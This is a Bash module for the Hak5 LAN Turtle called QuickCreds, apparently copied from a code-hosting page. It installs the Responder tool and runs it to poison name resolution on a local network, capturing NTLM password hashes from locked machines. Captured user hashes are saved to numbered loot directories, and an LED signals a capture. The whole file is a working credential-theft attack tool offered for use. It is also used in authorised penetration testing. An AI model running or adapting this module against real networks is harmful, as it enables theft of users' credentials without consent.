170 lines
4.7 KiB
Bash
170 lines
4.7 KiB
Bash
#!/bin/bash /usr/lib/turtle/turtle_module
|
|
VERSION="1.3"
|
|
DESCRIPTION="Snagging creds from locked machines --Mubix, Room362.com. Implements responder attack and saves creds to numbered directories in /root/loot. LED will blink rapidly while QuickCreds is running. Upon capture of NTLM hash the amber LED will light solid. Author: Hak5Darren. Credit: Mubix."
|
|
CONF=/tmp/QuickCreds.form
|
|
|
|
: ${DIALOG_OK=0}
|
|
: ${DIALOG_CANCEL=1}
|
|
: ${DIALOG_HELP=2}
|
|
: ${DIALOG_EXTRA=3}
|
|
: ${DIALOG_ITEM_HELP=4}
|
|
: ${DIALOG_ESC=255}
|
|
|
|
|
|
|
|
|
|
|
|
|
|
function configure {
|
|
# dialog --title "QuickCreds" --msgbox "\n\
|
|
# Dependencies will be installed. An Internet connection is required.\n\
|
|
# Upon configuration creds will be saved to /root/loot/ on boot." 9 72
|
|
|
|
dialog --title "QuickCreds" \
|
|
--yesno "\nInstall dependencies and configure QuickCreds?\n\
|
|
An Internet connection is required for installation.\n" 8 60
|
|
response=$?
|
|
case $response in
|
|
0) ;;
|
|
1) exit ;;
|
|
255) exit ;;
|
|
esac
|
|
|
|
|
|
# Check to see if QuickCreds has already been configured
|
|
if [[ -d /root/loot || -s /root/loot/responder.log ]];
|
|
then
|
|
dialog --title "QuickCreds" --msgbox "\nThe QuickCreds module is already configured.\n\
|
|
Creds are saved to /root/loot.\nEnable this module to attack on boot." 9 72
|
|
exit 1
|
|
fi
|
|
|
|
# Check for Internet connection
|
|
ping -q -w 5 -c 1 lanturtle.com &> /dev/null && {
|
|
:
|
|
} || {
|
|
dialog --title "QuickCreds" --msgbox "\n\
|
|
The LAN Turtle is currently offline.\nPlease connect the LAN Turtle to the Internet and try again. " 9 72
|
|
exit 1
|
|
}
|
|
|
|
# Install dependencies
|
|
opkg update | dialog --progressbox "Updating opkg" 14 72
|
|
|
|
if [[ ! $(opkg list-installed | grep git) ]];
|
|
then
|
|
opkg install git | dialog --progressbox "Installing dependency git" 14 72
|
|
fi
|
|
|
|
if [[ ! $(opkg list-installed | grep python-sqlite3) ]];
|
|
then
|
|
opkg install python-sqlite3 | dialog --progressbox "Installing dependency python-sqlite3" 14 72
|
|
fi
|
|
|
|
if [[ ! $(opkg list-installed | grep screen) ]];
|
|
then
|
|
opkg install screen | dialog --progressbox "Installing dependency screen" 14 72
|
|
fi
|
|
|
|
if [[ ! $(opkg list-installed | grep python-openssl) ]];
|
|
then
|
|
opkg install python-openssl | dialog --progressbox "Installing dependency python-openssl" 14 72
|
|
fi
|
|
|
|
if [[ ! $(opkg list-installed | grep coreutils-sleep) ]];
|
|
then
|
|
opkg install coreutils-sleep | dialog --progressbox "Installing dependency coreutils-sleep" 14 72
|
|
fi
|
|
|
|
if [[ ! -d /etc/turtle/Responder || ! -s /etc/turtle/Responder/Responder.py ]];
|
|
then
|
|
rm -rf /etc/turtle/Responder
|
|
git clone git://github.com/lgandx/responder /etc/turtle/Responder -q | dialog --progressbox "Installing dependency responder" 14 72
|
|
rm -rf /etc/turtle/Responder/.git
|
|
fi
|
|
|
|
# Setup loot directory and complete setup
|
|
mkdir /root/loot
|
|
touch /root/loot/responder.log
|
|
|
|
dialog --title "QuickCreds" --msgbox "\n\
|
|
Configuration complete. Creds will be saved to /root/loot\n\
|
|
Enable this module to have it start the attack on boot.\n" 9 72
|
|
}
|
|
|
|
|
|
|
|
|
|
|
|
|
|
function start {
|
|
# Stop on-off-on DHCP blink pattern script
|
|
echo "Stopping DHCP Detect Blink Script"
|
|
/etc/init.d/dhcp_detect stop
|
|
echo ""
|
|
echo "QuickCreds started."
|
|
echo "LED will blink rapidly while QuickCreds is running."
|
|
echo "LED will light solid upon NTLM hash capture."
|
|
echo ""
|
|
echo "If starting this module from the Turtle Shell menu,"
|
|
echo "press CTRL+C to return."
|
|
|
|
echo "Starting attack..." >> /root/loot/responder.log
|
|
|
|
# Create new numbered loot directory and symlink it from Responder logs
|
|
cd /root/loot
|
|
dircount=$(ls -lad /root/loot/* | wc -l)
|
|
mkdir /root/loot/$((dircount))
|
|
# Delete all current Responder logs
|
|
rm -rf /etc/turtle/Responder/logs
|
|
ln -s /root/loot/$((dircount)) /etc/turtle/Responder/logs
|
|
|
|
# Stop dnsmasq
|
|
/etc/init.d/dnsmasq stop 1&> /dev/null
|
|
|
|
# Execute attack
|
|
screen -dmS responder bash -c 'cd /etc/turtle/Responder; python Responder.py -I br-lan -w -r -d -P'
|
|
|
|
# Blink upon hash capture
|
|
while true; do
|
|
# Grep for user creds and do not match on machine creds, machine usernames end in $
|
|
if [ $(grep -v '\$:' /etc/turtle/Responder/logs/*NTLM* 2>/dev/null) ];
|
|
then
|
|
if [[ ! $(cat /root/loot/responder.log | tail -n1) == *"Creds"* ]]
|
|
then
|
|
echo "Creds saved!" >> /root/loot/responder.log
|
|
#copy all responder logs to loot directory
|
|
cp /etc/turtle/Responder/logs/* /root/loot/$((dircount))
|
|
finished
|
|
fi
|
|
fi
|
|
echo 255 > /sys/class/leds/turtle\:yellow\:system/brightness
|
|
/usr/bin/sleep 0.04
|
|
echo 0 > /sys/class/leds/turtle\:yellow\:system/brightness
|
|
/usr/bin/sleep 0.04
|
|
done
|
|
}
|
|
|
|
|
|
|
|
function finished {
|
|
echo 255 > /sys/class/leds/turtle\:yellow\:system/brightness
|
|
exit
|
|
}
|
|
|
|
|
|
function stop {
|
|
kill $(ps | grep [R]esponder | awk {'print $1'})
|
|
/etc/init.d/dnsmasq start 1&> /dev/null
|
|
echo "QuickCreds Stopped"
|
|
}
|
|
|
|
|
|
|
|
|
|
|
|
|
|
function status {
|
|
if ps | grep -w -q [R]esponder.py; then echo "1"; else echo "0"; fi
|
|
}
|